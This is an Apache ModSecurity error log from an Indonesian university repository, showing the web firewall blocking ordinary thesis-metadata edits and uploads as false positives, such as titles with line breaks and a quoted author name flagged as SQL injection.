[Mon Aug 28 09:57:14.664466 2023] [:error] [pid 39800] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:notes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) .  found within ARGS:notes: Eduardo, 2022. Pengaruh Kompetensi dan Independensi Auditor terhadap\\x0d\\x0aKualitas Audit Internal (Studi pada PT. Progress Group Jakarta) . Skripsi ini\\x0d\\x0aprogram studi Akuntansi Fakultas Ekonomi dan Bisnis Universitas\\x0d\\x0aLanglangbuana Bandung. Dibiming oleh pembimbing H. R. Hidayat dan Dudi\\x0d\\x0aHendaryan. Penelitian ini bertujuan untuk mengetahui dan menganalisis pengaruh\\x0d\\x0akomptensi dan independensi auditor terhadap kualitas audit internal p..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNCsCo-f0AAJt4ULcAAAAP"]
[Mon Aug 28 09:57:34.145849 2023] [:error] [pid 39716] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNHsCo-f0AAJskb24AAAAG"]
[Mon Aug 28 09:57:39.438364 2023] [:error] [pid 39716] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNI8Co-f0AAJskb28AAAAG"]
[Mon Aug 28 09:57:46.702378 2023] [:error] [pid 39909] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNKsCo-f0AAJvlLr4AAAAU"]
[Mon Aug 28 09:57:53.686942 2023] [:error] [pid 39578] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNMcCo-f0AAJqaLbsAAAAN"]
[Mon Aug 28 09:58:04.177966 2023] [:error] [pid 39716] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNPMCo-f0AAJskb3AAAAAG"]
[Mon Aug 28 09:58:08.243996 2023] [:error] [pid 39716] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNQMCo-f0AAJskb3EAAAAG"]
[Mon Aug 28 09:58:09.038462 2023] [:error] [pid 39716] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNQcCo-f0AAJskb3IAAAAG"]
[Mon Aug 28 09:58:09.563607 2023] [:error] [pid 39716] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNQcCo-f0AAJskb3MAAAAG"]
[Mon Aug 28 09:58:09.862346 2023] [:error] [pid 39716] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNQcCo-f0AAJskb3QAAAAG"]
[Mon Aug 28 09:58:16.339603 2023] [:error] [pid 39797] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNSMCo-f0AAJt1OJcAAAAK"]
[Mon Aug 28 09:58:17.217419 2023] [:error] [pid 39797] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNScCo-f0AAJt1OJgAAAAK"]
[Mon Aug 28 09:58:17.462492 2023] [:error] [pid 39797] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNScCo-f0AAJt1OJkAAAAK"]
[Mon Aug 28 09:58:17.694447 2023] [:error] [pid 39797] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNScCo-f0AAJt1OJoAAAAK"]
[Mon Aug 28 09:58:27.253622 2023] [:error] [pid 39788] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNU8Co-f0AAJtsYT0AAAAA"]
[Mon Aug 28 09:58:27.947121 2023] [:error] [pid 39788] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNU8Co-f0AAJtsYT4AAAAA"]
[Mon Aug 28 09:58:50.867558 2023] [:error] [pid 39868] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNasCo-f0AAJu82H8AAAAL"]
[Mon Aug 28 09:58:52.090061 2023] [:error] [pid 39868] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNbMCo-f0AAJu82IAAAAAL"]
[Mon Aug 28 09:58:52.394590 2023] [:error] [pid 39868] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNbMCo-f0AAJu82IEAAAAL"]
[Mon Aug 28 09:58:52.587593 2023] [:error] [pid 39868] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNbMCo-f0AAJu82IIAAAAL"]
[Mon Aug 28 09:58:52.983861 2023] [:error] [pid 39868] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNbMCo-f0AAJu82IMAAAAL"]
[Mon Aug 28 09:58:53.212739 2023] [:error] [pid 39868] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNbcCo-f0AAJu82IQAAAAL"]
[Mon Aug 28 09:58:53.533873 2023] [:error] [pid 39868] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNbcCo-f0AAJu82IUAAAAL"]
[Mon Aug 28 09:59:09.640536 2023] [:error] [pid 39925] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a\\x0d\\x0a found within ARGS:title: TINJAUAN YURIDIS PENEGAKAN KODE ETIK JAKSA BERDASARKAN PERATURAN JAKSA AGUNG REPUBLIK INDONESIA NOMOR PER\\xe2\\x80\\x93014/A/JA/11/2012 TENTANG KODE PERILAKU JAKSA \\x0d\\x0a\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwNfcCo-f0AAJv19uYAAAAM"]
[Mon Aug 28 10:10:16.509016 2023] [:error] [pid 40063] [client 47.128.30.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ALAM, SYAMSUL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwQGMCo-f0AAJx-fDMAAAAZ"]
[Mon Aug 28 10:28:35.423165 2023] [:error] [pid 40447] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_UNMATCHED_BOUNDARY" required. [file "/etc/modsecurity/modsecurity.conf"] [line "80"] [id "200003"] [msg "Multipart parser detected a possible unmatched boundary."] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/pop_attach.php"] [unique_id "ZOwUY8Co-f0AAJ3-hXAAAAAN"]
[Mon Aug 28 10:28:53.114688 2023] [:error] [pid 40442] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_UNMATCHED_BOUNDARY" required. [file "/etc/modsecurity/modsecurity.conf"] [line "80"] [id "200003"] [msg "Multipart parser detected a possible unmatched boundary."] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/pop_attach.php"] [unique_id "ZOwUdcCo-f0AAJ36tKkAAAAB"]
[Mon Aug 28 10:30:19.559987 2023] [:error] [pid 40344] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_UNMATCHED_BOUNDARY" required. [file "/etc/modsecurity/modsecurity.conf"] [line "80"] [id "200003"] [msg "Multipart parser detected a possible unmatched boundary."] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/pop_attach.php"] [unique_id "ZOwUy8Co-f0AAJ2Y3ycAAAAX"]
[Mon Aug 28 10:30:23.976600 2023] [:error] [pid 40344] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH DEBT TO EQUITY RATIO DAN NET\\x0d\\x0aPROFIT MARGIN TERHADAP EARNING PER SHARE \\x0d\\x0a(Studi Pada Subsektor Transportasi Periode 2016-2020)\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwUz8Co-f0AAJ2Y3ygAAAAX"]
[Mon Aug 28 10:30:24.901047 2023] [:error] [pid 40344] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH DEBT TO EQUITY RATIO DAN NET\\x0d\\x0aPROFIT MARGIN TERHADAP EARNING PER SHARE \\x0d\\x0a(Studi Pada Subsektor Transportasi Periode 2016-2020)\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwU0MCo-f0AAJ2Y3ykAAAAX"]
[Mon Aug 28 10:30:25.117045 2023] [:error] [pid 40344] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH DEBT TO EQUITY RATIO DAN NET\\x0d\\x0aPROFIT MARGIN TERHADAP EARNING PER SHARE \\x0d\\x0a(Studi Pada Subsektor Transportasi Periode 2016-2020)\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwU0cCo-f0AAJ2Y3yoAAAAX"]
[Mon Aug 28 10:30:25.554469 2023] [:error] [pid 40344] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x0d\\x0a( found within ARGS:title: PENGARUH DEBT TO EQUITY RATIO DAN NET\\x0d\\x0aPROFIT MARGIN TERHADAP EARNING PER SHARE \\x0d\\x0a(Studi Pada Subsektor Transportasi Periode 2016-2020)\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/admin/modules/bibliography/index.php"] [unique_id "ZOwU0cCo-f0AAJ2Y3ysAAAAX"]
